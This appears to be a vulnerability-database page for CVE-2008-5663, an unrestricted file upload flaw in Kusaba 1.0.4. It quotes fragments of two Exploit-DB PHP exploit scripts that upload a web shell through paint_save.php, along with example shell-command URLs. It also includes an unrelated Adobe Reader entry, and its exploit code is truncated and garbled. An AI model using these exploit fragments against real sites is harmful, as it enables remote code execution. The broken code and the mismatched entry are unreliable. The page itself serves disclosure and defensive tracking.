CVE-2008-5663
published 2008-12-19CVE-2008-5663: Multiple unrestricted file upload vulnerabilities in Kusaba 1.0.4 and earlier allow remote authenticated users to execute arbitrary code by uploading a file…
PriorityP354critical9CVSS 2.0
AVNACLAuSCCICAC
EXPLOIT
EPSS
6.27%
92.7th percentile
Multiple unrestricted file upload vulnerabilities in Kusaba 1.0.4 and earlier allow remote authenticated users to execute arbitrary code by uploading a file with an executable extension using (1) load_receiver.php or (2) a shipainter action to paint_save.php, then accessing the uploaded file via a direct request to this file in their user directory.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| kusaba | kusaba | <= 1.0.4 | — |
CVSS provenance
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
vendor_redhat9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-rmcv-5fxr-m463: Multiple unrestricted file upload vulnerabilities in Kusaba 1
ghsa_unreviewed·2022-05-17
CVE-2008-5663 [HIGH] CWE-20 GHSA-rmcv-5fxr-m463: Multiple unrestricted file upload vulnerabilities in Kusaba 1
Multiple unrestricted file upload vulnerabilities in Kusaba 1.0.4 and earlier allow remote authenticated users to execute arbitrary code by uploading a file with an executable extension using (1) load_receiver.php or (2) a shipainter action to paint_save.php, then accessing the uploaded file via a direct request to this file in their user directory.
Red Hat
acroread JavaScript Insecure Method Exposure
vendor_redhat·2008-02-08·CVSS 9.3
CVE-2007-5663 [CRITICAL] acroread JavaScript Insecure Method Exposure
acroread JavaScript Insecure Method Exposure
Adobe Reader and Acrobat 8.1.1 and earlier allows remote attackers to execute arbitrary code via a crafted PDF file that calls an insecure JavaScript method in the EScript.api plug-in. NOTE: this issue might be subsumed by CVE-2008-0655.
No detection rules found.
Exploit-DB
Kusaba 1.0.4 - Remote Code Execution (1)
exploitdb·2008-10-09
CVE-2008-5663 Kusaba 1.0.4 - Remote Code Execution (1)
Kusaba 1.0.4 - Remote Code Execution (1)
---
After execution:
http://www.kusaba.image.board/url/kasubaoek/oekaki.php?pc=print "Hello";
http://www.kusaba.image.board/url/kasubaoek/oekaki.php?sc=echo Hello
**********************************/
$shellname = 'oekaki.php'; // any filename ending in php
$server = 'http://www.kusaba.image.board/url/'; // BBS website, with
trailing slash
$image = file_get_contents('test.jpg'); // image to upload (any valid
picture)
$magicquotes = true;
if ($magicquotes)
{
$shellcode = 'what this is for',
);
function build_data($adata)
{
$data = '';
foreach ($adata as $k => $v)
{
$data .= "$k=$v;";
}
return substr($data,0,-1);
}
function data_len($data)
{
return str_pad(strlen($data),8,'0',STR_PAD_LEFT);
}
$request = new
HttpRequest($server.'paint_save.php?ap
Exploit-DB
Kusaba 1.0.4 - Remote Code Execution (2)
exploitdb·2008-10-09
CVE-2008-5663 Kusaba 1.0.4 - Remote Code Execution (2)
Kusaba 1.0.4 - Remote Code Execution (2)
---
Will work if they have left the load_receiver.php script un-edited.
After execution: (Yes these are the exact URLs)
http://www.kusaba.image.board/url/change this to the same value as your
KU_ROOTDIRpost.php?pc=print "Hello";
http://www.kusaba.image.board/url/change this to the same value as your
KU_ROOTDIRpost.php?sc=echo Hello
-->
# milw0rm.com [2008-10-09]
http://securityreason.com/securityalert/4782http://www.securityfocus.com/bid/31668http://www.securityfocus.com/bid/31685https://exchange.xforce.ibmcloud.com/vulnerabilities/45793https://exchange.xforce.ibmcloud.com/vulnerabilities/45794https://www.exploit-db.com/exploits/6706https://www.exploit-db.com/exploits/6711http://securityreason.com/securityalert/4782http://www.securityfocus.com/bid/31668http://www.securityfocus.com/bid/31685https://exchange.xforce.ibmcloud.com/vulnerabilities/45793https://exchange.xforce.ibmcloud.com/vulnerabilities/45794https://www.exploit-db.com/exploits/6706https://www.exploit-db.com/exploits/6711
2008-12-19
Published